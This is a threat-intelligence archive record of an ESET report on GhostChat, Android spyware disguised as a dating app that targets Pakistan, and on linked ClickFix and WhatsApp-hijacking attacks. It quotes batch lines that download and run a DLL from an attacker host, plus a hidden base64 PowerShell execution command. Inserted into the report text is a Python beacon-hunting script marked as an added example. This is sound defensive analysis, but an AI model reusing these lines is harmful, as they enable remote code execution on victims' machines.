{
	"id": "12025651-9812-4d9d-a4d8-baab60c70413",
	"created_at": "2026-04-06T00:11:21.526995Z",
	"updated_at": "2026-04-10T03:37:54.306329Z",
	"deleted_at": null,
	"sha1_hash": "95eaf05dc912d34a0e8947c140919754aad402f2",
	"title": "Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2431403,
	"plain_text": "Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan\r\nBy Lukas Stefanko\r\nArchived: 2026-04-02 12:33:55 UTC\r\nESET researchers have uncovered an Android spyware campaign leveraging romance scam tactics to target individuals in Pakistan. The campaign uses a malicious app posing as a chat platform that allows users to initiate conversations with specific “girls” – fake profiles probably operated via WhatsApp. Underneath the romance charade, the real purpose of the malicious app, which we named GhostChat, is exfiltration of the victim’s data – both upon first execution and continually while the app is installed on the device. The campaign employs a layer of deception that we have not previously seen in similar schemes – the fake female profiles in GhostChat are presented to potential victims as locked, with passcodes required to access them. However, as the codes are hardcoded in the app, this is just a social engineering tactic likely aimed at creating the impression of “exclusive access” for the potential victims. While we don’t know how the malicious app is distributed, we assume that this exclusivity tactic is used as part of the lure, with the purported access codes distributed along with the app.\r\nFurther investigation revealed that the same threat actor appears to be running a broader spy operation – including a ClickFix attack leading to the compromise of victims’ computers, and a WhatsApp device-linking attack gaining access to victims’ WhatsApp accounts – thus expanding the scope of surveillance. These related attacks used websites impersonating Pakistani governmental organizations as lures.\r\nGhostChat, detected by ESET as Android/Spy.GhostChat.A, has never been available on Google Play. As an App Defense Alliance partner, we shared our findings with Google. 
Android users are automatically protected against known versions of this spyware by Google Play Protect, which is enabled by default on Android devices with Google Play Services.\r\nKey points of this blogpost:\r\nESET researchers uncovered an Android spyware campaign that uses romance scam tactics to target individuals in Pakistan.\r\nGhostChat, the malicious app used in the campaign, poses as a dating chat platform with seemingly locked female profiles. However, since the access codes are hardcoded in the app, this is just a trick to create the impression of exclusive access.\r\nOnce installed, the GhostChat spyware enables covert surveillance, allowing the threat actor to monitor device activity and exfiltrate sensitive data.\r\nOur investigation revealed further activities conducted by the same threat actor: an attack involving ClickFix, which tricks users into executing malicious code on their computers; and a WhatsApp attack that exploits the app’s link-to-device feature to access victims’ personal messages.\r\nhttps://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/\r\nPage 1 of 14\n\nOverview\r\nOn September 11th, 2025, a suspicious Android application was uploaded to VirusTotal from Pakistan. Our analysis revealed that while the app uses the icon of a legitimate dating app, it lacks the original app’s functionality and instead serves as a lure – and tool – for mobile espionage.\r\nThe malicious app, which we named GhostChat, has never been available on Google Play, and it required manual installation by users who had to enable permissions for installing apps from unknown sources. 
Once the app is installed, its operators can monitor, and exfiltrate sensitive data from, the victim’s device.\r\nAlthough the campaign appears to be focused on Pakistan, we currently lack sufficient evidence to attribute it to a specific threat actor.\r\nAttack flow\r\nAs illustrated in Figure 1, the attack begins with the distribution of GhostChat – a malicious Android app (package name com.datingbatch.chatapp) disguised to appear as a legitimate chat platform called Dating Apps without payment; this legitimate app is available on Google Play and is unrelated to GhostChat other than through the latter using its icon. GhostChat’s source and mode of distribution remain unknown.\r\nFigure 1. GhostChat attack flow\r\nUpon execution, GhostChat requests several permissions, as seen in Figure 2. After the permissions are granted, the app presents the user with a login screen. In order to proceed, victims must enter login credentials, as shown in Figure 3.\r\nFigure 2. GhostChat requests several permissions upon execution\r\nFigure 3. GhostChat’s login screen\r\nContrary to how a legitimate verification would normally work, the credentials are hardcoded in the application code, as seen in Figure 4, and are not processed by any server. This implies that both the app and the credentials are distributed together, probably by the threat actor.\r\nFigure 4. 
Hardcoded credentials in the app’s code (username: chat; password: 12345)\r\nOnce logged in, victims are presented with a selection of 14 female profiles, each featuring a photo, name, and age. All profiles are marked as Locked, and tapping on one of them prompts the victim to enter an unlock code, as seen in Figure 5.\r\nFigure 5. Chatting requires an unlock code\r\nThese codes are also hardcoded and not validated remotely, suggesting that they are probably preshared with the victim. Each profile is linked to a specific WhatsApp number with a Pakistani (+92) country code. The numbers are embedded in the app, as seen in Figure 6, and cannot be changed remotely. This suggests that the operator either owns multiple Pakistani SIM cards or has access to a third-party provider who sells them. The use of local numbers reinforces the illusion that the profiles are real individuals based in Pakistan, increasing the credibility of the scam.\r\nUpon entering the correct code, the app redirects the user to WhatsApp to initiate a conversation with the assigned number – presumably operated by the threat actor.\r\nFigure 6. WhatsApp numbers, names, ages, and codes linked to each profile\r\nWhile the victim engages with the app, even before logging in, the GhostChat spyware runs in the background and silently monitors device activity and exfiltrates sensitive data to a C\u0026C server; see Figure 7.\r\nFigure 7. File exfiltration to C\u0026C server (in the green outline)\r\nBeyond initial exfiltration, GhostChat engages in active espionage: it sets up a content observer to monitor newly created images and uploads them as they appear. 
Additionally, it schedules a periodic task that scans for new documents every five minutes, ensuring continual surveillance and data harvesting.\r\nThe initial data exfiltration includes the device ID, the contact list in the form of a .txt file (uploaded to the C\u0026C server from the app’s cache), and files stored on the device (images, PDFs, Word, Excel, PowerPoint files, and Open XML file formats).\r\nDuring our investigation, we identified related activities and discovered a connection: a DLL file, as illustrated in Figure 8.\r\nFigure 8. Overview of the related activities revealed by the investigation\r\nFurther analysis of the C\u0026C server used by GhostChat revealed three additional files communicating with the same server, which were uploaded to VirusTotal; see Figure 9. These include two batch scripts and one DLL file.\r\nFigure 9. Malicious files communicating with the same C\u0026C server\r\nThe batch files were designed to download and execute a DLL payload from the URL https://hitpak[.]org/notepad2.dll. At the time of analysis, the DLL was no longer available on the server, but the intent was clearly to deliver and run malicious code on the victim’s machine. Below is a snippet of the script:\r\necho powershell -Command \"Invoke-WebRequest -Uri 'https://hitpak[.]org/notepad2.dll' -OutFile '%TEMP%\\notepad2.dll'\"\r\necho timeout /t 10\r\necho rundll32.exe \"%TEMP%\\notepad2.dll\",notepad\r\nClickFix attack\r\nThe third file – a DLL file hosted at https://foxy580.github[.]io/koko/file.dll – served as the payload in a separate ClickFix-based attack. ClickFix is a social engineering technique that tricks users into manually executing malicious code on their devices by following seemingly legitimate instructions. 
ClickFix relies on user interaction – often through deceptive websites or fake alerts – to guide victims into downloading and running malicious scripts. This attack used a fake website impersonating Pakistan’s Computer Emergency Response Team (PKCERT), located at https://buildthenations[.]info/PKCERT/pkcert.html, as shown in Figure 10.\r\nFigure 10. Deceptive website impersonating Pakistan’s Computer Emergency Response Team\r\nThe site displayed a fabricated security warning allegedly affecting national infrastructure and government networks, urging users to click an Update button. This action triggered ClickFix instructions, as seen in Figure 11, which led to the download and execution of the malicious DLL. The campaign was publicly identified by a self-described security researcher, __0XYC__, on X.\r\nFigure 11. ClickFix instructions (source: https://x.com/__0XYC__/status/1972166420403572852/photo/1)\r\nFile.dll\r\nThe DLL payload used in the ClickFix campaign exhibits classic C\u0026C behavior with a focus on remote code execution. Once loaded, the DLL initiates communication with its C\u0026C server by sending the compromised machine’s username and computer name to:\r\nhttps://hitpak[.]org/page.php?tynor=\u003cComputerName\u003esss\u003cUsername\u003e\r\nIf the DLL fails to retrieve either the username or computer name, it substitutes them with default placeholders – UnUsr probably for unknown user and UPC for unknown PC – ensuring the request still reaches the server.\r\nFollowing this initial handshake, the DLL enters an infinite loop, making requests to the C\u0026C server every five minutes, awaiting instructions. 
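The beacon described above is a convenient hunting target, because every infected host announces itself with the same URL shape and then keeps polling on a fixed cycle. The following Python is an added example, not code from the ESET report: it pulls the tynor parameter out of web-proxy log lines, keeps the UnUsr/UPC placeholder case visible, and flags clients whose requests recur on the DLL’s five-minute cycle. The log layout and every host, address and user name in it are constructed for this example; only the URL pattern, the sss delimiter, the placeholder values and the polling interval come from the analysis above.

```python
# Added example, not code from the ESET report: hunting for the file.dll beacon
# in web-proxy logs. The URL shape, the sss delimiter, the UnUsr/UPC placeholders
# and the five-minute interval come from the report; the log format and every
# address, host name and user name below are constructed for this example.
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

C2_HOST = 'hitpak.org'           # defanged in the report as hitpak[.]org
C2_PATH = '/page.php'
DELIM = 'sss'                    # separates <ComputerName> from <Username>
PLACEHOLDERS = {'UPC', 'UnUsr'}  # defaults the DLL sends when a lookup fails
BEACON_SECONDS = 300             # the DLL polls the server every five minutes

# Constructed log lines: <timestamp> <client IP> <requested URL>
SAMPLE_LOG = '''
2025-09-12T10:00:03Z 10.1.2.3 https://hitpak.org/page.php?tynor=DESKTOP-7Q2sssalice
2025-09-12T10:05:04Z 10.1.2.3 https://hitpak.org/page.php?tynor=DESKTOP-7Q2sssalice
2025-09-12T10:10:02Z 10.1.2.3 https://hitpak.org/page.php?tynor=DESKTOP-7Q2sssalice
2025-09-12T10:11:40Z 10.1.2.9 https://hitpak.org/page.php?tynor=UPCsssUnUsr
2025-09-12T10:12:00Z 10.1.2.5 https://example.org/page.php?tynor=notrelated
'''.strip()


def parse_tynor(url):
    '''Return the beacon fields for one URL, or None if it is not a beacon.

    The delimiter is ambiguous when a computer name or user name itself
    contains sss, so the split is on the first occurrence and such records
    are flagged as ambiguous instead of being silently mis-parsed.
    '''
    parts = urlsplit(url)
    if parts.hostname != C2_HOST or parts.path != C2_PATH:
        return None
    values = parse_qs(parts.query).get('tynor')
    if not values or DELIM not in values[0]:
        return None
    value = values[0]
    computer, user = value.split(DELIM, 1)
    return {
        'computer': computer,
        'user': user,
        'placeholder': computer in PLACEHOLDERS or user in PLACEHOLDERS,
        'ambiguous': value.count(DELIM) > 1,
    }


def find_beacons(log_text):
    '''Scan whitespace-separated proxy log lines and return the beacon records.'''
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        stamp, client, url = fields
        info = parse_tynor(url)
        if info is None:
            continue
        info['client'] = client
        info['time'] = datetime.strptime(stamp, '%Y-%m-%dT%H:%M:%SZ')
        hits.append(info)
    return hits


def periodic_clients(hits, tolerance=30):
    '''Clients whose consecutive beacons all fall within tolerance seconds of
    the five-minute interval; a single hit has no interval and is not counted.'''
    by_client = defaultdict(list)
    for hit in hits:
        by_client[hit['client']].append(hit['time'])
    periodic = []
    for client, times in by_client.items():
        times.sort()
        gaps = [(later - earlier).total_seconds()
                for earlier, later in zip(times, times[1:])]
        if gaps and all(abs(gap - BEACON_SECONDS) <= tolerance for gap in gaps):
            periodic.append(client)
    return sorted(periodic)


if __name__ == '__main__':
    beacons = find_beacons(SAMPLE_LOG)
    for beacon in beacons:
        print(beacon['client'], beacon['computer'], beacon['user'],
              'placeholder' if beacon['placeholder'] else '')
    print('clients beaconing on a five-minute cycle:', periodic_clients(beacons))
```

Run it directly to print the parsed beacons. The periodicity check is the more durable of the two signals: a domain or IP can be swapped, but an implant that polls every five minutes keeps that cadence in any proxy log, so the check is worth keeping even after the indicator list goes stale.\r\n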
The server responds with a base64-encoded PowerShell command, which the DLL executes using the following method:\r\npowershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('\u003cdata_from_C\u0026C\u003e')) | Invoke-Expression\"\r\nThis approach allows the operator to execute arbitrary PowerShell commands on the victim’s machine without triggering visible alerts, leveraging PowerShell’s flexibility and stealth capabilities. From the defender’s side, that same command line is conspicuous in process-creation telemetry: powershell.exe started with ExecutionPolicy Bypass, a hidden window, and FromBase64String piped into Invoke-Expression is a pattern worth alerting on.\r\nAt the time of analysis, the C\u0026C server did not respond with any PowerShell payloads, suggesting either a dormant stage of the campaign or that the server was awaiting specific victim identifiers before issuing commands.\r\nWhatsApp-linking attack\r\nIn addition to desktop targeting in the ClickFix attack, the domain buildthenations[.]info was used in a mobile-focused operation aimed at WhatsApp users. Victims were lured into joining a supposed community – posing as a channel of the Pakistan Ministry of Defence (Figure 12) – by scanning a QR code to link their Android or iPhone device to WhatsApp Web or Desktop.\r\nFigure 12. Lure to link mobile device to threat actor’s WhatsApp\r\nKnown as GhostPairing, this technique allows an adversary to gain access to the victim’s chat history and contacts, acquiring the same level of visibility and control over the account as the owner, effectively compromising their private communications. This is not the first time we have seen threat actors trying to hijack victims’ messaging accounts. 
In 2023, the China-aligned APT group GREF used BadBazaar Android malware to secretly autolink victims’ Signal accounts to the attacker’s device, which allowed the threat actor to spy on their victims’ Signal communications.\r\nAfter scanning the QR code presented by the fake Ministry of Defence website, the victim can see in WhatsApp, as with any legitimate device link, that a new device has been linked to their account. After some time, WhatsApp also sends a notification to the victim, alerting them that a new device has been linked to their account, as seen in Figure 13.\r\nFigure 13. Within two hours, WhatsApp sent a notification informing the user that their account had been linked to another device\r\nTaken together, these findings suggest a coordinated, multiplatform campaign that blends social engineering, malware delivery, and espionage across both mobile and desktop environments.\r\nConclusion\r\nThis investigation reveals a highly targeted and multifaceted espionage campaign aimed at users in Pakistan. At its core is a malicious Android application disguised as a chat app, which employs a novel romance scam tactic requiring credentials and unlock codes to initiate communication – a level of effort and personalization not commonly seen in mobile threats.\r\nOnce installed, the app silently exfiltrates sensitive data and actively monitors the device for new content, confirming its role as a mobile surveillance tool. The campaign is also connected to broader infrastructure involving ClickFix-based malware delivery and WhatsApp account hijacking techniques. 
These operations leverage fake websites, impersonation of national authorities, and deceptive, QR-code-based device linking to compromise both desktop and mobile platforms.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 | Filename | Detection | Description\r\nB15B1F3F2227EBA4B69C85BDB638DF34B9D30B6A | Live Chat.apk | Android/Spy.GhostChat.A | Android GhostChat spyware.\r\n8B103D0AA37E5297143E21949471FD4F6B2ECBAA | file.dll | Win64/Agent.HEM | Windows payload that executes PowerShell commands from the C\u0026C.\r\nNetwork\r\nIP | Domain | Hosting provider | First seen | Details\r\n188.114.96[.]10 | hitpak[.]org | Cloudflare, Inc. | 2024-12-16 | Distribution and C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK mobile techniques.\r\nTactic | ID | Name | Description\r\nPersistence | T1398 | Boot or Logon Initialization Scripts | GhostChat receives the BOOT_COMPLETED broadcast intent to activate at device startup.\r\nPersistence | T1541 | Foreground Persistence | GhostChat uses foreground persistence to keep a service running.\r\nDiscovery | T1426 | System Information Discovery | GhostChat can extract the device ID.\r\nCollection | T1533 | Data from Local System | GhostChat can exfiltrate files from a device.\r\nCollection | T1636.003 | Protected User Data: Contact List | GhostChat can extract the device’s contact list.\r\nCommand and Control | T1437.001 | Application Layer Protocol: Web Protocols | GhostChat can communicate with the C\u0026C using HTTPS requests.\r\nExfiltration | T1646 | Exfiltration Over C2 Channel | GhostChat exfiltrates data using HTTPS.\r\nThis table was built using version 17 of the MITRE ATT\u0026CK enterprise techniques.\r\nTactic | ID | Name | Description\r\nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Windows agent can execute PowerShell commands received from the C\u0026C server.\r\nDiscovery | T1082 | System Information Discovery | Windows agent collects the computer name.\r\nDiscovery | T1033 | System Owner/User Discovery | Windows agent collects the username.\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | Windows agent can communicate with the C\u0026C using HTTPS requests.\r\nCommand and Control | T1132.001 | Data Encoding: Standard Encoding | Windows agent receives base64 encoded PowerShell commands to execute.\r\nSource: https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/"
	],
	"report_names": [
		"love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan"
	],
	"threat_actors": [
		{
			"id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e",
			"created_at": "2022-10-25T15:50:23.453824Z",
			"updated_at": "2026-04-10T02:00:05.28793Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"Ke3chang",
				"APT15",
				"Vixen Panda",
				"GREF",
				"Playful Dragon",
				"RoyalAPT",
				"Nylon Typhoon"
			],
			"source_name": "MITRE:Ke3chang",
			"tools": [
				"Okrum",
				"Systeminfo",
				"netstat",
				"spwebmember",
				"Mimikatz",
				"Tasklist",
				"MirageFox",
				"Neoichor",
				"ipconfig"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "adfbe698-24b2-41fc-a701-781fef330b16",
			"created_at": "2024-01-09T02:00:04.17648Z",
			"updated_at": "2026-04-10T02:00:03.504826Z",
			"deleted_at": null,
			"main_name": "GREF",
			"aliases": [],
			"source_name": "MISPGALAXY:GREF",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c",
			"created_at": "2022-10-25T16:07:23.750796Z",
			"updated_at": "2026-04-10T02:00:04.736762Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"APT 15",
				"BackdoorDiplomacy",
				"Bronze Davenport",
				"Bronze Idlewood",
				"Bronze Palace",
				"CTG-9246",
				"G0004",
				"G0135",
				"GREF",
				"Ke3chang",
				"Metushy",
				"Nylon Typhoon",
				"Operation Ke3chang",
				"Operation MirageFox",
				"Playful Dragon",
				"Playful Taurus",
				"PurpleHaze",
				"Red Vulture",
				"Royal APT",
				"Social Network Team",
				"Vixen Panda"
			],
			"source_name": "ETDA:Ke3chang",
			"tools": [
				"Agentemis",
				"Anserin",
				"BS2005",
				"BleDoor",
				"CarbonSteal",
				"Cobalt Strike",
				"CobaltStrike",
				"DarthPusher",
				"DoubleAgent",
				"EternalBlue",
				"GoldenEagle",
				"Graphican",
				"HenBox",
				"HighNoon",
				"IRAFAU",
				"Ketrican",
				"Ketrum",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MS Exchange Tool",
				"Mebroot",
				"Mimikatz",
				"MirageFox",
				"NBTscan",
				"Okrum",
				"PluginPhantom",
				"PortQry",
				"ProcDump",
				"PsList",
				"Quarian",
				"RbDoor",
				"RibDoor",
				"Royal DNS",
				"RoyalCli",
				"RoyalDNS",
				"SAMRID",
				"SMBTouch",
				"SilkBean",
				"Sinowal",
				"SpyWaller",
				"Theola",
				"TidePool",
				"Torpig",
				"Turian",
				"Winnti",
				"XSLCmd",
				"cobeacon",
				"nbtscan",
				"netcat",
				"spwebmember"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434281,
	"ts_updated_at": 1775792274,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/95eaf05dc912d34a0e8947c140919754aad402f2.pdf",
		"text": "https://archive.orkl.eu/95eaf05dc912d34a0e8947c140919754aad402f2.txt",
		"img": "https://archive.orkl.eu/95eaf05dc912d34a0e8947c140919754aad402f2.jpg"
	}
}